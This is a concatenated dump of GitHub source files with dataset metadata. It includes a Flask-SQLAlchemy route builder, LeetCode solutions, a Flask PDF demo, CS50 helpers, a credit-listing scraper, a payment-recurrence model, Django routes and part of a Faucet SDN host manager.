construct_post_view_function(\n _model, post_input_schema,\n entities_group=self,\n pre_processors=post_op.before_save,\n post_processors=post_op.after_save,\n schemas_registry=schemas_registry,\n allow_unknown_fields=allow_unknown_fields,\n dict_struct=post_op.response_dict_struct or dict_struct_for_model,\n exception_handler=post_op.exception_handler or default_exception_handler,\n access_checker=post_op.access_checker or default_access_checker,\n remove_property_keys_before_validation=post_op.remove_property_keys_before_validation \n if post_op.remove_property_keys_before_validation is not None\n else remove_property_keys_before_validation,\n remove_relationship_keys_before_validation=post_op.remove_relationship_keys_before_validation \n if post_op.remove_relationship_keys_before_validation is not None \n else remove_relationship_keys_before_validation,\n remove_assoc_proxy_keys_before_validation=post_op.remove_assoc_proxy_keys_before_validation\n if post_op.remove_assoc_proxy_keys_before_validation is not None \n else remove_assoc_proxy_keys_before_validation,\n fields_allowed_to_be_set=post_op.settable_fields or fields_allowed_to_be_set_for_all_views,\n fields_forbidden_from_being_set=union([\n fields_forbidden_from_being_set_for_all_views,\n post_op.non_settable_fields or []\n ]))\n post_url = post_op.url or \"/%s\" % base_url\n app_or_bp.route(\n post_url, methods=['POST'], endpoint='post_%s' % endpoint_slug)(\n post_func)\n views[_model_name]['post'] = {edk.URL: post_url}\n if callable(post_op.input_schema_modifier):\n views[_model_name]['post']['input_schema'] = post_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if entity.put:\n put_op = entity.put\n if callable(put_op.input_schema_modifier):\n put_input_schema = put_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n put_input_schema = model_default_input_schema\n put_func = put_op.view_function or construct_put_view_function(\n _model, put_input_schema,\n entities_group=self,\n permitted_object_getter=put_op.permitted_object_getter or entity.permitted_object_getter,\n pre_processors=put_op.before_save,\n post_processors=put_op.after_save,\n dict_struct=put_op.response_dict_struct or dict_struct_for_model,\n allow_unknown_fields=allow_unknown_fields,\n query_constructor=put_op.query_modifier or default_query_constructor,\n schemas_registry=schemas_registry,\n exception_handler=put_op.exception_handler or default_exception_handler,\n access_checker=put_op.access_checker or default_access_checker,\n remove_property_keys_before_validation=put_op.remove_property_keys_before_validation \n if put_op.remove_property_keys_before_validation is not None \n else remove_property_keys_before_validation,\n remove_relationship_keys_before_validation=put_op.remove_relationship_keys_before_validation\n if put_op.remove_relationship_keys_before_validation is not None\n else remove_relationship_keys_before_validation,\n remove_assoc_proxy_keys_before_validation=put_op.remove_assoc_proxy_keys_before_validation\n if put_op.remove_assoc_proxy_keys_before_validation is not None\n else remove_assoc_proxy_keys_before_validation,\n fields_allowed_to_be_set=put_op.settable_fields or fields_allowed_to_be_set_for_all_views,\n fields_forbidden_from_being_set=union([\n fields_forbidden_from_being_set_for_all_views,\n put_op.non_settable_fields or []\n ]))\n put_url = put_op.url or \"/%s/<_id>\" % base_url\n app_or_bp.route(\n put_url, methods=['PUT'], endpoint='put_%s' % endpoint_slug)(\n put_func)\n views[_model_name]['put'] = {edk.URL: put_url}\n if callable(put_op.input_schema_modifier):\n views[_model_name]['put']['input_schema'] = put_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if entity.patch:\n patch_op = entity.patch\n if callable(patch_op.input_schema_modifier):\n patch_input_schema = patch_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n patch_input_schema = model_default_input_schema\n patch_func = patch_op.view_function or construct_patch_view_function(\n _model, patch_input_schema,\n pre_processors=patch_op.before_save,\n commands=patch_op.commands,\n post_processors=patch_op.after_save,\n query_constructor=patch_op.query_modifier or default_query_constructor,\n permitted_object_getter=patch_op.permitted_object_getter or entity.permitted_object_getter,\n schemas_registry=schemas_registry,\n exception_handler=patch_op.exception_handler or default_exception_handler,\n access_checker=patch_op.access_checker or default_access_checker,\n dict_struct=patch_op.response_dict_struct or dict_struct_for_model)\n patch_url = patch_op.url or \"/%s/<_id>\" % base_url\n app_or_bp.route(\n patch_url, methods=['PATCH'], endpoint='patch_%s' % endpoint_slug)(\n patch_func)\n views[_model_name]['patch'] = {edk.URL: patch_url}\n if callable(patch_op.input_schema_modifier):\n views[_model_name]['patch']['input_schema'] = patch_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if entity.delete:\n delete_op = entity.delete\n delete_func = delete_op.view_function or construct_delete_view_function(\n _model,\n query_constructor=delete_op.query_modifier or default_query_constructor,\n pre_processors=delete_op.before_save,\n permitted_object_getter=delete_op.permitted_object_getter or entity.permitted_object_getter,\n post_processors=delete_op.after_save,\n exception_handler=delete_op.exception_handler or default_exception_handler,\n access_checker=delete_op.access_checker or default_access_checker)\n delete_url = delete_op.url or \"/%s/<_id>\" % base_url\n app_or_bp.route(\n delete_url, methods=['DELETE'], endpoint='delete_%s' % endpoint_slug)(\n delete_func)\n views[_model_name]['delete'] = {edk.URL: delete_url}\n\n if entity.batch_save:\n batch_save_op = entity.batch_save\n if callable(batch_save_op.input_schema_modifier):\n batch_save_input_schema = batch_save_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n batch_save_input_schema = model_default_input_schema\n batch_save_func = batch_save_op.view_function or construct_batch_save_view_function(\n _model, batch_save_input_schema,\n app_or_bp=app_or_bp,\n pre_processors_for_post=fetch_nested_key(entity, 'post.before_save'),\n pre_processors_for_put=fetch_nested_key(entity, 'put.before_save'),\n post_processors_for_post=fetch_nested_key(entity, 'post.after_save'),\n post_processors_for_put=fetch_nested_key(entity, 'put.before_save'),\n extra_pre_processors=batch_save_op.extra_actions_before_save,\n extra_post_processors=batch_save_op.extra_actions_after_save,\n unique_identifier_fields=batch_save_op.unique_identifier_fields,\n dict_struct=batch_save_op.response_dict_struct or dict_struct_for_model,\n allow_unknown_fields=allow_unknown_fields,\n query_constructor=batch_save_op.query_modifier or default_query_constructor,\n schemas_registry=schemas_registry,\n exception_handler=batch_save_op.exception_handler or default_exception_handler,\n tmp_folder_path=tmp_folder_path,\n fields_forbidden_from_being_set=union([\n fields_forbidden_from_being_set_for_all_views,\n batch_save_op.non_settable_fields or []\n ]),\n celery_worker=celery_worker,\n result_saving_instance_model=batch_save_op.result_saving_instance_model,\n result_saving_instance_getter=batch_save_op.result_saving_instance_getter,\n run_as_async_task=batch_save_op.run_as_async_task,\n update_only=batch_save_op.update_only, create_only=batch_save_op.create_only,\n skip_pre_processors=batch_save_op.skip_pre_processors,\n skip_post_processors=batch_save_op.skip_post_processors\n )\n batch_save_url = batch_save_op.url or \"/batch-save/%s\" % base_url\n app_or_bp.route(\n batch_save_url, methods=['POST'], endpoint='batch_save_%s' % endpoint_slug)(\n batch_save_func)\n views[_model_name]['batch_save'] = {edk.URL: batch_save_url}\n if callable(batch_save_op.input_schema_modifier):\n views[_model_name]['batch_save']['input_schema'] = batch_save_op.input_schema_modifier(\n deepcopy(model_schemas[_model.__name__]['input_schema']))\n\n if register_schema_definition:\n def schema_def():\n return Response(\n json.dumps(\n registry,\n default=json_encoder, sort_keys=True),\n 200, mimetype='application/json')\n if cache_handler:\n schema_def = cache_handler.cached(timeout=86400)(schema_def)\n app_or_bp.route(schema_def_url, methods=['GET'])(schema_def)\n\n if register_views_map:\n def views_map():\n return Response(\n json.dumps(\n registry[edk.OPERATION_MODIFIERS],\n default=json_encoder, sort_keys=True),\n 200, mimetype='application/json')\n if cache_handler:\n views_map = cache_handler.cached(timeout=86400)(views_map)\n app_or_bp.route(views_map_url, methods=['GET'])(views_map)\n\n\n","repo_name":"SuryaSankar/flask-sqlalchemy-booster","sub_path":"flask_sqlalchemy_booster/entities_router/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":50680,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"30022068566","text":"# encoding: utf-8\n\"\"\"\n@author: Dianlei Zhang\n@contact: dianlei.zhang@qq.com\n@time: 2018/12/18 4:01 PM\n\"\"\"\n\n\ndef solve(board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: void Do not return anything, modify board in-place instead.\n \"\"\"\n if board:\n\n queue = []\n\n for index, i in enumerate(board[0]):\n if i == \"O\":\n board[0][index] = \"-\"\n queue.append([0, index])\n\n for index, i in enumerate(board[-1]):\n if i == \"O\":\n board[len(board) - 1][index] = \"-\"\n queue.append([len(board) - 1, index])\n\n for i in range(len(board)):\n if board[i][0] == \"O\":\n board[i][0] = \"-\"\n queue.append([i, 0])\n\n for i in range(len(board)):\n if board[i][-1] == \"O\":\n board[i][len(board[0]) - 1] = \"-\"\n queue.append([i, len(board[0]) - 1])\n\n while queue:\n top = queue.pop(0)\n x, y = top[0], top[1]\n # 上下左右添加\n if x - 1 > 0 and board[x - 1][y] == \"O\":\n board[x - 1][y] = \"-\"\n queue.append([x - 1, y])\n if x + 1 < len(board) and board[x + 1][y] == \"O\":\n board[x + 1][y] = \"-\"\n queue.append([x + 1, y])\n if y - 1 > 0 and board[x][y - 1] == \"O\":\n board[x][y - 1] = \"-\"\n queue.append([x, y - 1])\n if y + 1 < len(board[0]) and board[x][y + 1] == \"O\":\n board[x][y + 1] = \"-\"\n queue.append([x, y + 1])\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] == \"O\":\n board[i][j] = \"X\"\n if board[i][j] == \"-\":\n board[i][j] = \"O\"\n\n print(queue)\n return board\n\n\nif __name__ == '__main__':\n board = [\n [\"X\", \"O\", \"X\", \"X\", \"X\"],\n [\"X\", \"X\", \"O\", \"X\", \"O\"],\n [\"O\", \"X\", \"X\", \"X\", \"X\"],\n [\"X\", \"X\", \"O\", \"X\", \"X\"]\n ]\n\n board = [\n ]\n\n board = [[\"O\", \"O\", \"O\"], [\"O\", \"O\", \"O\"], [\"O\", \"O\", \"O\"]]\n\n print(solve(board))\n","repo_name":"zhangdianlei/LeetCode_python","sub_path":"src/part2/c130.py","file_name":"c130.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6567318259","text":"#\n# @lc app=leetcode id=212 lang=python3\n#\n# [212] Word Search II\n#\n\n# @lc code=start\n\n\nclass TrieNode:\n def __init__(self):\n self.children = {}\n self.isWord = False\n\n def addWord(self, word):\n cur = self\n for c in word:\n if c not in cur.children:\n cur.children[c] = TrieNode()\n cur = cur.children[c]\n cur.isWord = True\n\n\nclass Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n root = TrieNode()\n for w in words:\n root.addWord(w)\n\n row, col = len(board), len(board[0])\n res, visit = set(), set()\n\n def dfs(r, c, node, word):\n\n if (\n r < 0\n or c < 0\n or r == row\n or c == col\n or board[r][c] not in node.children\n or (r, c) in visit\n ):\n return\n if not node.children[board[r][c]]:\n del node.children[board[r][c]]\n visit.add((r, c))\n\n node = node.children[board[r][c]]\n word += board[r][c]\n if node.isWord:\n res.add(word)\n node.isWord = False\n\n dfs(r + 1, c, node, word)\n dfs(r - 1, c, node, word)\n dfs(r, c + 1, node, word)\n dfs(r, c - 1, node, word)\n visit.remove((r, c))\n\n for i in range(row):\n for j in range(col):\n dfs(i, j, root, \"\")\n\n return list(res)\n\n\n# @lc code=end\n","repo_name":"chojs23/problemSolving","sub_path":"leetcode/212.word-search-ii.py","file_name":"212.word-search-ii.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"31638626786","text":"from flask import Flask, render_template, request\nfrom flask.helpers import make_response\nfrom borb.pdf.canvas.layout.page_layout.multi_column_layout import SingleColumnLayout\nfrom borb.pdf.canvas.layout.text.paragraph import Paragraph\nfrom borb.pdf.document import Document\nfrom borb.pdf.page.page import Page\nfrom borb.pdf.pdf import PDF\nimport io\nimport os\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef hello_world():\n return render_template(\"screengrab.html\")\n\n\n@app.route(\"/\")\ndef hello_name(name):\n viewport_height = request.cookies.get(\"viewportHeight\")\n viewport_width = request.cookies.get(\"viewportWidth\")\n\n return \"

Hello, {}! Your viewport size is {}x{}.

\".format(\n name, viewport_width, viewport_height\n )\n\n\n@app.route(\"/pdf/.pdf\")\ndef hello_pdf(name):\n viewport_width = request.cookies.get(\"viewportWidth\")\n viewport_height = request.cookies.get(\"viewportHeight\")\n if viewport_width is None or viewport_height is None:\n viewport_size = []\n else:\n viewport_size = [int(viewport_width), int(viewport_height)]\n\n # create an empty Document\n pdf = Document()\n\n # add an empty Page\n page = Page(*viewport_size)\n pdf.append_page(page)\n\n # use a PageLayout (SingleColumnLayout in this case)\n layout = SingleColumnLayout(page)\n\n # add a Paragraph object\n p = Paragraph(\n f\"Hello World! Your computer screen size is {viewport_width}x{viewport_height}. Click me! I'm a link!\"\n )\n layout.add(p)\n\n # add a link to the layout\n page.append_remote_go_to_annotation(p.get_bounding_box(), uri=\"/\")\n\n # binary_pdf = io.BytesIO()\n # PDF.dumps(binary_pdf, pdf)\n\n # print(binary_pdf.read())\n # print(pdf.pages)\n\n # response = make_response(binary_pdf.read())\n\n with open(\"test.pdf\", \"wb\") as binary_pdf:\n PDF.dumps(binary_pdf, pdf)\n\n with open(\"test.pdf\", \"rb\") as binary_pdf:\n response = make_response(binary_pdf.read())\n\n response.headers[\"Content-Type\"] = \"application/pdf\"\n response.headers[\"Content-Disposition\"] = 'filename=\"%s.pdf\"' % name\n return response\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"theonesean/responsive-pdfsite","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2199145709","text":"from nltk.tokenize import sent_tokenize\n\n\ndef lines(a, b):\n \"\"\"Return lines in both a and b\"\"\"\n\n # Split each string into lines\n LinesA = set(a.splitlines())\n LinesB = set(b.splitlines())\n\n return LinesA & LinesB\n\n\ndef sentences(a, b):\n \"\"\"Return sentences in both a and b\"\"\"\n\n # Split each string into sentences\n SentencesA = set(sent_tokenize(a))\n SentencesB = set(sent_tokenize(b))\n\n return SentencesA & SentencesB\n\n\ndef substrings(a, b, n):\n \"\"\"Return substrings of length n in both a and b\"\"\"\n\n SubstringsA = substring_divider(a, n)\n SubstringsB = substring_divider(b, n)\n\n identical_substrings = set()\n for substring in SubstringsA:\n if substring == substring in SubstringsB:\n identical_substrings.add(substring)\n\n return identical_substrings\n\n\ndef substring_divider(s, n):\n \"\"\"returns list of substrings of a certain length using recursion\"\"\"\n\n substrings = set()\n while(True):\n if len(s) < n:\n break\n else:\n substring = s[0:(n)]\n substrings.add(substring)\n s = s[1:]\n return substrings","repo_name":"jdonahue135/CS50","sub_path":"pset7/similarities/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8658058889","text":"__author__ = 'Chen'\n#coding=utf-8\n#如果读取post异常,使用浏览器刷新网页或“编辑与重发”\nimport urllib.request,urllib.parse\nimport re\nfrom datetime import *\nfrom YCParser import YCParser\n\nclass GetYCParser(YCParser):\n\n def changedate(self,fdate): #处理日期格式\n if (fdate.find('年')==-1)&(fdate.find('-')==-1):\n cdate=date(int(fdate[0:4]),int(fdate[4:6]),int(fdate[6:8]))\n else:\n if fdate.find('-')!=-1:\n fdate=fdate.replace('-','年',1)\n fdate=fdate.replace('-','月',1)\n fdate=fdate+'日'\n reg=r'年(.*?)月'\n pattern=re.compile(reg)\n month=int(pattern.findall(fdate)[0])\n reg=r'月(.*?)日'\n pattern=re.compile(reg)\n day=int(pattern.findall(fdate)[0])\n cdate=date(int(fdate[0:4]),month,day)\n return cdate\n\n def getpostdata(self,pageNos):\n postdata=urllib.parse.urlencode({\n 'searchContent':'',\n 'page':'%d'% pageNos\n }).encode('utf-8')\n return postdata\n\n def getentlist(self,startdate,enddate):\n pageNos=0\n while True:\n try:\n pageNos+=1\n if pageNos>18678:break\n req=urllib.request.Request(\n url='http://tjcredit.gov.cn/platform/saic/exclist.ftl',\n data=self.getpostdata(pageNos),\n headers={'User-Agent':'Magic Browser'}\n )\n result=self.gethtml(req)\n infolist=result.findAll('li',attrs={'class':'tb-a1'})\n datelist=result.findAll('li',attrs={'class':'tb-a3'})\n l=len(datelist)\n del infolist[0]\n del datelist[0]\n except Exception:\n self.printpageerror(pageNos)\n continue\n else:\n print('Page %d Reading' % pageNos)\n k=0\n for i in range(l):\n try:\n cdate=str(datelist[i].contents[0])\n cdate=self.changedate(cdate)\n if (cdate>=startdate)&(cdate<=enddate):\n Name=infolist[i].find('a').contents[0].replace('\\n','').strip()\n if self.checkname(Name)==False:continue\n href=infolist[i].find('a').get('href')\n reg=r'entId=(.*)'\n pattern=re.compile(reg)\n entId=pattern.findall(href)[0]\n entdict=dict(Name=Name,entId=entId)\n self.PrintInfo(entdict,self.f)\n if cdate tuple:\n \"\"\" Collection amount \"\"\"\n return float(self.collection[\"amount\"]), self.collection[\"currency\"]\n\n @property\n def date(self) -> datetime:\n \"\"\" Collection date \"\"\"\n return date_time.parse_json_date(self.collection[\"date\"])\n\n @property\n def description(self) -> str:\n \"\"\" Description \"\"\"\n return self.collection[\"description\"]\n\n @property\n def json(self) -> dict:\n \"\"\" Collection in JSON format \"\"\"\n return self.collection\n\n@dataclass\nclass Recurrence:\n \"\"\" Payment recurrence \"\"\"\n recurrence: dict\n\n @property\n def amount(self) -> tuple:\n \"\"\" Amount \"\"\"\n return float(self.recurrence[\"amount\"]), self.currency\n\n @property\n def collections(self) -> list:\n \"\"\" All collections in recurrence \"\"\"\n output = []\n for col in self.recurrence[\"collections\"]:\n output.append(Collection(col))\n return output\n\n @property\n def currency(self) -> str:\n \"\"\" Currency \"\"\"\n return self.recurrence[\"currency\"]\n\n @property\n def expected_payment_date(self) -> datetime:\n \"\"\" Expected payment date \"\"\"\n return date_time.parse_json_date(self.recurrence[\"expected_payment_date\"])\n\n @expected_payment_date.setter\n def expected_payment_date(self, date: datetime):\n \"\"\" Expected payment date \"\"\"\n self.recurrence[\"expected_payment_date\"] = date.isoformat()\n\n @property\n def open_amount(self) -> tuple:\n \"\"\" Open amount \"\"\"\n if self.cleared:\n return 0, self.currency\n\n open_amount, open_currency = self.amount\n currency_conv = CurrencyConverter()\n\n for coll in self.collections:\n coll_amount, coll_curr = coll.amount\n converted_coll_amount = currency_conv.convert_to_currency(\n coll_amount,\n coll_curr,\n open_currency)\n open_amount -= converted_coll_amount\n\n return open_amount, open_currency\n\n @property\n def paid_amount(self) -> tuple:\n \"\"\" Paid amount \"\"\"\n full_amount, full_currency = self.amount\n open_amount, open_currency = self.open_amount\n assert full_currency == open_currency\n return (full_amount - open_amount), full_currency\n\n @property\n def realistic_payment_date(self) -> datetime:\n \"\"\" Realistic payment date \"\"\"\n epd = self.expected_payment_date\n rcd = self.recurrence_date\n\n if epd > rcd:\n output = epd\n else:\n output = rcd\n\n return date_time.get_nearest_workday(output, backwards=True)\n\n @property\n def json(self) -> dict:\n \"\"\" Recurrence as JSON (dict) \"\"\"\n return self.recurrence\n\n @property\n def recurrence_date(self) -> datetime:\n \"\"\" Recurrence date \"\"\"\n return date_time.parse_json_date(self.recurrence[\"recurrence_date\"])\n\n @property\n def approaching_or_late(self) -> bool:\n \"\"\" Is recurrence approaching or late? \"\"\"\n if self.cleared:\n return False\n return self.recurrence_date <= datetime.datetime.now() + datetime.timedelta(\n days=config.CONSTANTS[\"PAYMENT_NOTIFICATION_BUFFER\"])\n\n @property\n def cleared(self) -> bool:\n \"\"\" Is recurrence cleared? \"\"\"\n return self.recurrence[\"cleared\"]\n\n @cleared.setter\n def cleared(self, cleared: bool):\n \"\"\" Is recurrence cleared? \"\"\"\n self.recurrence[\"cleared\"] = cleared\n\n def add_collection(self, collection: Collection):\n \"\"\" Add new collection \"\"\"\n self.recurrence[\"collections\"].append(collection.json)\n\n def toggle_cleared(self):\n \"\"\" Toggle cleared forth and back \"\"\"\n if self.cleared:\n self.cleared = False\n else:\n self.cleared = True\n","repo_name":"keremkoseoglu/Kifu","sub_path":"model/payment/recurrence.py","file_name":"recurrence.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39094793002","text":"from . import views\nfrom django.urls import path, include\n\nurlpatterns = [\n path(\"\", views.show_all_objec),\n path(\"grups\", views.Show_all_grups.as_view(), name='all_grups'),\n path(\"grups/\", views.DetailGrup.as_view(), name='one_grup'),\n path(\"grups//\", views.random_objecs, name='random_objecs'),\n path('__debug__/', include('debug_toolbar.urls')),\n]\n\n","repo_name":"lemon1964/KidLogic","sub_path":"Extra_item/Item/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6520880909","text":"from faucet import valve_of\nfrom faucet.valve_manager_base import ValveManagerBase\n\n\nclass ValveHostManager(ValveManagerBase):\n \"\"\"Manage host learning on VLANs.\"\"\"\n\n def __init__(self, logger, ports, vlans, eth_src_table, eth_dst_table,\n eth_dst_hairpin_table, pipeline, learn_timeout, learn_jitter,\n learn_ban_timeout, cache_update_guard_time, idle_dst, stack,\n has_externals, stack_root_flood_reflection):\n self.logger = logger\n self.ports = ports\n self.vlans = vlans\n self.eth_src_table = eth_src_table\n self.eth_dst_table = eth_dst_table\n self.eth_dst_hairpin_table = eth_dst_hairpin_table\n self.pipeline = pipeline\n self.learn_timeout = learn_timeout\n self.learn_jitter = learn_jitter\n self.learn_ban_timeout = learn_ban_timeout\n self.low_priority = self._LOW_PRIORITY\n self.host_priority = self._MATCH_PRIORITY\n self.cache_update_guard_time = cache_update_guard_time\n self.output_table = self.eth_dst_table\n self.idle_dst = idle_dst\n self.stack = stack\n self.has_externals = has_externals\n self.stack_root_flood_reflection = stack_root_flood_reflection\n if self.eth_dst_hairpin_table:\n self.output_table = self.eth_dst_hairpin_table\n\n def ban_rules(self, pkt_meta):\n \"\"\"Limit learning to a maximum configured on this port/VLAN.\n\n Args:\n pkt_meta: PacketMeta instance.\n Returns:\n list: OpenFlow messages, if any.\n \"\"\"\n ofmsgs = []\n\n port = pkt_meta.port\n eth_src = pkt_meta.eth_src\n vlan = pkt_meta.vlan\n\n entry = vlan.cached_host(eth_src)\n if entry is None:\n if port.max_hosts:\n if port.hosts_count() == port.max_hosts:\n ofmsgs.append(self._temp_ban_host_learning(\n self.eth_src_table.match(in_port=port.number)))\n port.dyn_learn_ban_count += 1\n self.logger.info(\n 'max hosts %u reached on %s, '\n 'temporarily banning learning on this port, '\n 'and not learning %s' % (\n port.max_hosts, port, eth_src))\n if vlan is not None and vlan.max_hosts:\n hosts_count = vlan.hosts_count()\n if hosts_count == vlan.max_hosts:\n ofmsgs.append(self._temp_ban_host_learning(self.eth_src_table.match(vlan=vlan)))\n vlan.dyn_learn_ban_count += 1\n self.logger.info(\n 'max hosts %u reached on VLAN %u, '\n 'temporarily banning learning on this VLAN, '\n 'and not learning %s on %s' % (\n vlan.max_hosts, vlan.vid, eth_src, port))\n return ofmsgs\n\n def del_port(self, port):\n ofmsgs = []\n ofmsgs.append(\n self.eth_src_table.flowdel(self.eth_src_table.match(in_port=port.number)))\n for table in (self.eth_dst_table, self.eth_dst_hairpin_table):\n if table:\n # per OF 1.3.5 B.6.23, the OFA will match flows\n # that have an action targeting this port.\n ofmsgs.append(table.flowdel(out_port=port.number))\n vlans = port.vlans()\n if port.stack:\n vlans = self.vlans.values()\n for vlan in vlans:\n vlan.clear_cache_hosts_on_port(port)\n return ofmsgs\n\n def initialise_tables(self):\n ofmsgs = []\n for vlan in self.vlans.values():\n ofmsgs.append(self.eth_src_table.flowcontroller(\n match=self.eth_src_table.match(vlan=vlan),\n priority=self.low_priority,\n inst=[self.eth_src_table.goto(self.output_table)]))\n return ofmsgs\n\n def _temp_ban_host_learning(self, match):\n return self.eth_src_table.flowdrop(\n match,\n priority=(self.low_priority + 1),\n hard_timeout=self.learn_ban_timeout)\n\n def delete_host_from_vlan(self, eth_src, vlan):\n \"\"\"Delete a host from a VLAN.\"\"\"\n ofmsgs = [self.eth_src_table.flowdel(\n self.eth_src_table.match(vlan=vlan, eth_src=eth_src))]\n for table in (self.eth_dst_table, self.eth_dst_hairpin_table):\n if table:\n ofmsgs.append(table.flowdel(table.match(vlan=vlan, eth_dst=eth_src)))\n return ofmsgs\n\n def expire_hosts_from_vlan(self, vlan, now):\n \"\"\"Expire hosts from VLAN cache.\"\"\"\n expired_hosts = vlan.expire_cache_hosts(now, self.learn_timeout)\n if expired_hosts:\n vlan.dyn_last_time_hosts_expired = now\n self.logger.info(\n '%u recently active hosts on VLAN %u, expired %s' % (\n vlan.hosts_count(), vlan.vid, expired_hosts))\n return expired_hosts\n\n def _jitter_learn_timeout(self, base_learn_timeout, port, eth_dst):\n \"\"\"Calculate jittered learning timeout to avoid synchronized host timeouts.\"\"\"\n # Hosts on this port never timeout.\n if port.permanent_learn:\n return 0\n if not base_learn_timeout:\n return 0\n # Jitter learn timeout based on eth address, so timeout processing is jittered,\n # the same hosts will timeout approximately the same time on a stack.\n jitter = hash(eth_dst) % self.learn_jitter\n min_learn_timeout = base_learn_timeout - self.learn_jitter\n return int(max(abs(min_learn_timeout + jitter), self.cache_update_guard_time))\n\n def learn_host_timeouts(self, port, eth_src):\n \"\"\"Calculate flow timeouts for learning on a port.\"\"\"\n learn_timeout = self._jitter_learn_timeout(self.learn_timeout, port, eth_src)\n\n # Update datapath to no longer send packets from this mac to controller\n # note the use of hard_timeout here and idle_timeout for the dst table\n # this is to ensure that the source rules will always be deleted before\n # any rules on the dst table. Otherwise if the dst table rule expires\n # but the src table rule is still being hit intermittantly the switch\n # will flood packets to that dst and not realise it needs to relearn\n # the rule\n # NB: Must be lower than highest priority otherwise it can match\n # flows destined to controller\n src_rule_idle_timeout = 0\n src_rule_hard_timeout = learn_timeout\n dst_rule_idle_timeout = learn_timeout + self.cache_update_guard_time\n if not self.idle_dst:\n dst_rule_idle_timeout = 0\n return (src_rule_idle_timeout, src_rule_hard_timeout, dst_rule_idle_timeout)\n\n def learn_host_intervlan_routing_flows(self, port, vlan, eth_src, eth_dst):\n \"\"\"Returns flows for the eth_src_table that enable packets that have been\n routed to be accepted from an adjacent DP and then switched to the destination.\n Eth_src_table flow rule to match on port, eth_src, eth_dst and vlan\n\n Args:\n port (Port): Port to match on.\n vlan (VLAN): VLAN to match on\n eth_src: source MAC address (should be the router MAC)\n eth_dst: destination MAC address\n \"\"\"\n ofmsgs = []\n (src_rule_idle_timeout, src_rule_hard_timeout, _) = self.learn_host_timeouts(port, eth_src)\n src_match = self.eth_src_table.match(vlan=vlan, eth_src=eth_src, eth_dst=eth_dst)\n src_priority = self.host_priority - 1\n inst = [self.eth_src_table.goto(self.output_table)]\n ofmsgs.extend([self.eth_src_table.flowmod(\n match=src_match,\n priority=src_priority,\n inst=inst,\n hard_timeout=src_rule_hard_timeout,\n idle_timeout=src_rule_idle_timeout)])\n return ofmsgs\n\n def learn_host_on_vlan_port_flows(self, port, vlan, eth_src,\n delete_existing, refresh_rules,\n src_rule_idle_timeout,\n src_rule_hard_timeout,\n dst_rule_idle_timeout):\n \"\"\"Return flows that implement learning a host on a port.\"\"\"\n ofmsgs = []\n\n # Delete any existing entries for MAC.\n if delete_existing:\n ofmsgs.extend(self.delete_host_from_vlan(eth_src, vlan))\n\n # Associate this MAC with source port.\n src_match = self.eth_src_table.match(\n in_port=port.number, vlan=vlan, eth_src=eth_src)\n src_priority = self.host_priority - 1\n\n inst = []\n\n inst.append(self.eth_src_table.goto(self.output_table))\n\n ofmsgs.append(self.eth_src_table.flowmod(\n match=src_match,\n priority=src_priority,\n inst=inst,\n hard_timeout=src_rule_hard_timeout,\n idle_timeout=src_rule_idle_timeout))\n\n hairpinning = port.hairpin or port.hairpin_unicast\n # If we are refreshing only and not in hairpin mode, leave existing eth_dst alone.\n if refresh_rules and not hairpinning:\n return ofmsgs\n\n external_forwarding_requested = None\n match_dict = {\n 'vlan': vlan, 'eth_dst': eth_src, valve_of.EXTERNAL_FORWARDING_FIELD: None}\n if self.has_externals:\n match_dict.update({\n valve_of.EXTERNAL_FORWARDING_FIELD: valve_of.PCP_EXT_PORT_FLAG})\n if port.tagged_vlans and port.loop_protect_external and self.stack:\n external_forwarding_requested = False\n elif not port.stack:\n external_forwarding_requested = True\n\n inst = self.pipeline.output(\n port, vlan, external_forwarding_requested=external_forwarding_requested)\n\n # Output packets for this MAC to specified port.\n ofmsgs.append(self.eth_dst_table.flowmod(\n self.eth_dst_table.match(**match_dict),\n priority=self.host_priority,\n inst=inst,\n idle_timeout=dst_rule_idle_timeout))\n\n if self.has_externals and not port.loop_protect_external:\n match_dict.update({\n valve_of.EXTERNAL_FORWARDING_FIELD: valve_of.PCP_NONEXT_PORT_FLAG})\n ofmsgs.append(self.eth_dst_table.flowmod(\n self.eth_dst_table.match(**match_dict),\n priority=self.host_priority,\n inst=inst,\n idle_timeout=dst_rule_idle_timeout))\n\n # If port is in hairpin mode, install a special rule\n # that outputs packets destined to this MAC back out the same\n # port they came in (e.g. multiple hosts on same WiFi AP,\n # and FAUCET is switching between them on the same port).\n if hairpinning:\n ofmsgs.append(self.eth_dst_hairpin_table.flowmod(\n self.eth_dst_hairpin_table.match(in_port=port.number, vlan=vlan, eth_dst=eth_src),\n priority=self.host_priority,\n inst=self.pipeline.output(port, vlan, hairpin=True),\n idle_timeout=dst_rule_idle_timeout))\n\n return ofmsgs\n\n def learn_host_on_vlan_ports(self, now, port, vlan, eth_src,\n delete_existing=True,\n 